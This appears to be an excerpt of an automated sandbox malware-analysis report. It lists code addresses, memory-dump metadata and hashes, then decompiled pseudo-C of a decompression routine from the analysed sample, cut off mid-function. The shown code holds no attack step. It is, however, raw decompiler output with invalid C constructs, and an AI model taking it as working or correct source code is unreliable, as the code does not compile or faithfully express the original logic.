                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x0040662a
                                              0x0040662a
                                              0x0040662d
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x00000000
                                              0x00406969
                                              0x0040696d
                                              0x0040698f
                                              0x00406992
                                              0x0040699c
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x00406979
                                              0x0040697c
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00406a5d
                                              0x00406a5d
                                              0x00000000
                                              0x00406a5d
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b1a
                                              0x00406a1b
                                              0x00000000
                                              0x00000000
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00406a21
                                              0x00406a1b
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406abf
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af1
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x004066e1
                                              0x004066e1
                                              0x00000000
                                              0x004066e1
                                              0x00406962
                                              0x00406b97
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00406bce
                                              0x00406bce
                                              0x00000000
                                              0x00406bce
                                              0x00406a1b
                                              0x004069a2
                                              0x0040699f
                                              0x00000000
                                              0x004065d6

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                              • Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
                                              • Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                              • Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004066F0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E004066F0() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
